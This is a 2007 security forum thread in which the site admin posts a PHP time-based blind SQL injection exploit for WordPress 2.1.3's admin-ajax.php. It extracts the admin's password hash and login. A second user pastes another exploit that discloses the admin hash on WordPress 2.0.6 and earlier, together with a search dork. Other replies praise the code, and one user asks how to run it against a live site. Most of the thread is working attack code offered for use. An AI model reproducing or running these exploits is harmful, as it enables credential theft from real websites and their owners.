IT Security and Insecurity Portal |
WordPress 2.1.3 sql injection blind fishing exploit ver. 2 |
Posted: Wed May 23, 2007 12:25 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
So this is the new version of the WordPress 2.1.3 sql injection blind fishing exploit. This time it can steal from target database not only md5 hash, but user login too.
For using this exploit you need:
1. working php installation
2. run this script as php CLI
3. modify needed parameters in script beginning
Code: |
$norm_delay = 0;
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
echo "\n\nWordPress 2.1.3 blind sql injection exploit by waraxe \n\n";
echo "Target: $url\n";
echo "sql table prefix: $prefix\n";
$suffix = md5(substr($url, 0, strlen($url) - 24));
echo "cookie suffix: $suffix\n";
echo "testing probe delays \n";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";
echo "trying to get md5 hash from target \n";
$hash = get_hash();
echo "trying to get user login from target \n";
$login = get_login();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Login: $login");
add_line("Hash: $hash");
echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
function get_login()
$field = 'user_login';
$out = '';
echo "first we need user login length ... \n";
$len = get_length($field, 60);
echo "user login length is $len chars\n";
echo "finding user login now ...\n";
for($i = 1; $i < $len + 1; $i ++)
$ch = get_anychar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
echo "\nFinal result: $field=$out\n\n";
return $out;
function get_length($field, $maxlen = 60)
global $prefix, $suffix, $id, $testcnt;
$len = 0;
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 0;
$max = $maxlen;
echo "starting $field length retrieve\n";
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$len = $max;
$len = $min;
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $len;
function get_hash()
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...\n";
for($i = 1; $i < $len + 1; $i ++)
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
echo "\nFinal result: $field=$out\n\n";
return $out;
function get_anychar($field,$pos)
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 32;
$max = 255;
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $char;
function get_hashchar($field,$pos)
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $char;
function test_condition($p)
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
die("too many tries - exiting ...\n");
echo "trying again - try $try ...\n";
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
$bret = true;
return $bret;
function get_normdelay($testcnt)
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";
return $mean_delayed;
function test_md5delay($cnt)
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
die("test_md5delay($cnt) - invalid return value, exiting ...");
$diff = $end - $start;
$delay = intval($diff * 10);
return $delay;
function getmicrotime()
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_REFERER, $referer);
if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
$fc = curl_exec($ch);
return $fc;
function add_line($buf)
global $outfile;
$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
Feedback is welcome!
Enjoy  |
Posted: Sun May 27, 2007 2:53 pm |
pexli |
Valuable expert |

Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
Working great.Thank you.  |
Posted: Mon May 28, 2007 9:31 am |
zoiz |
Beginner |

Joined: Mar 23, 2007 |
Posts: 4 |
thanks..nice xD~ works for me. |
Posted: Wed May 30, 2007 12:54 pm |
barr0w |
Regular user |

Joined: May 30, 2007 |
Posts: 13 |
Yesterday I built a LAMP box with PHP/CURL just to try this exploit out. It works PERFECTLY. I just wanted to say great work and thank you. Now if I was just more skilled at md5 hacking I'd be all set hahahah. |
Posted: Wed May 30, 2007 2:13 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
It's nice to hear positive feedback  |
Posted: Wed May 30, 2007 4:08 pm |
pexli |
Valuable expert |

Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
В Естонии кажется по русский умеют говорить.А может и ошибаюсь.
Все очень хорошо написал и работает класно.Молодец. |
Posted: Fri Jun 01, 2007 12:10 am |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
koko wrote: | В Естонии кажется по русский умеют говорить.А может и ошибаюсь.
Все очень хорошо написал и работает класно.Молодец. |
Thanks for feedback. Good to hear, that script works as expected.
Pro russkii -- eto ja umeju deistvitelno v kakomtom mere  |
Posted: Fri Jun 01, 2007 5:51 am |
pexli |
Valuable expert |

Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
Working people working scripts
И по русский сморю хорошо пишеш.Молодец.  |
Posted: Sat Jun 02, 2007 12:01 am |
mimic |
Beginner |

Joined: Jun 02, 2007 |
Posts: 2 |
The 2.2 version is also affected? |
Posted: Sat Jun 02, 2007 1:14 am |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
mimic wrote: | The 2.2 version is also affected? |
Nope, 2.2 is immune  |
Posted: Sat Jun 02, 2007 9:44 am |
scoobydoo |
Regular user |

Joined: Jun 02, 2007 |
Posts: 5 |
this exploit works in all < 2.1.3 versions? |
Posted: Sat Jun 02, 2007 1:28 pm |
pexli |
Valuable expert |

Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
No.In old versions file admin-ajax.php missing.
For old versions try this exploit.
Code: | <?php
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
if ($argc<3) {
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wordpress
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-t[prefix]: specify a table prefix (default: wp_)
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
function quick_dump($string)
for ($i=0; $i<=strlen($string)-1; $i++)
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
if (!$ock) {
echo 'No response from proxy...';die;
if ($proxy=='') {
while (!feof($ock)) {
else {
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
for ($i=3; $i<$argc; $i++){
if ($temp=="-p")
if ($temp=="-P")
if ($temp=="-t")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
function my_encode($my_string)
for ($k=0; $k<=strlen($my_string)-1; $k++)
if ($k==strlen($my_string)-1) {$encoded.=")";}
else {$encoded.=",";}
return $encoded;
echo "\npwd hash -> ";
while (!strstr($password,chr(0)))
for ($i=0; $i<=255; $i++)
if (in_array($i,$chars))
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
if ($i==255) {
die("\nExploit failed...");
echo "\n";
echo "admin user -> ";
while (!strstr($admin,chr(0)))
for ($i=0; $i<=255; $i++)
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
if ($i==255) {
die("\nExploit failed...");
echo "\n";
function is_hash($hash)
if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
else {return false;}
if (is_hash($password)) {
echo "exploit succeeded...";
else {
echo "exploit failed...";
# milw0rm.com [2007-01-10] |
Posted: Sat Jun 02, 2007 5:45 pm |
scoobydoo |
Regular user |

Joined: Jun 02, 2007 |
Posts: 5 |
hello koko thanks... but how do i actually use this? does this script required a ssh? and it does not have a place where to specify the host, etc etc like waraxe pasted above... can u pls paste another of the same script where i can specify to test it or can u tell me example? like what to change in the script? say i want to test it with example.com ... |
Posted: Sat Jun 02, 2007 5:50 pm |
pexli |
Valuable expert |

Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
Install php on your PC and run the script.Easy.  |
Posted: Sat Jun 02, 2007 6:11 pm |
scoobydoo |
Regular user |

Joined: Jun 02, 2007 |
Posts: 5 |
i want to test in a live wordpress site and when i run that script it says error |
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
Powered by phpBB © 2001-2008 phpBB Group